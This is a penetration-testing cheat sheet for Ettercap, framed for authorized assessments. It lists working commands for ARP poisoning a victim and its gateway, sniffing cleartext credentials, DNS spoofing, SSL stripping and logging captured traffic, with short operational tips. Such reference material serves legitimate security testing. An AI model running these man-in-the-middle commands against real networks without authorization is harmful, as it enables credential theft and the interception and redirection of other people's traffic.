Ettercap Cheat Sheet
LAN MITM framework for ARP poisoning, sniffing, and filter-based traffic manipulation on authorized networks.
Overview
Ettercap performs ARP spoofing and protocol sniffing on switched LANs during authorized internal assessments. Use only on networks where MITM is explicitly permitted.
Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.
Install
sudo apt install -y ettercap-text-only ettercap-graphicalEssential commands
Text UI
sudo ettercap -TARP poison two hosts (unified sniffing)
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.50//Common workflows
Victim 10.10.10.100, gateway 10.10.10.1
sudo ettercap -T -q -M arp:remote /10.10.10.1// /10.10.10.100// -i eth0Sniff credentials (cleartext protocols only) —
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.100// -i eth0/etc/ettercap/etter.dns
*.target.local A 10.10.14.5sudo ettercap -T -P dns_spoof -M arp:remote /10.10.10.1// /10.10.10.100//SSL stripping (legacy; HTTPS HSTS limits effectiveness) —
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.100// -F sslstrip.filterOne-shot poison then exit —
sudo ettercap -T -M arp:remote /10.10.10.1// /10.10.10.100// -i eth0 -s nopFlags reference
-T | Text mode |
|---|---|
-G | GTK GUI |
-M MODE | MITM (arp:remote, arp:reply, etc.) |
-i IF | Interface |
-q | Quiet |
-P PLUGIN | Load plugin (dns_spoof, etc.) |
-F FILE | Filter file |
// | Target syntax: MAC/IP/range |
-a | Show local addresses |
-L FILE | Log PCAP |
Tips
- ARP poisoning is disruptive; coordinate with client and use isolated lab VLANs when possible.
- Modern HTTPS + HSTS reduces credential capture; focus on cleartext, weak TLS, or corporate proxy paths.
- Stop poisoning after test: killall ettercap or Ctrl+C; verify ARP tables recover.
- Prefer Responder/Bettercap for many modern AD attacks; ettercap remains useful for custom filters.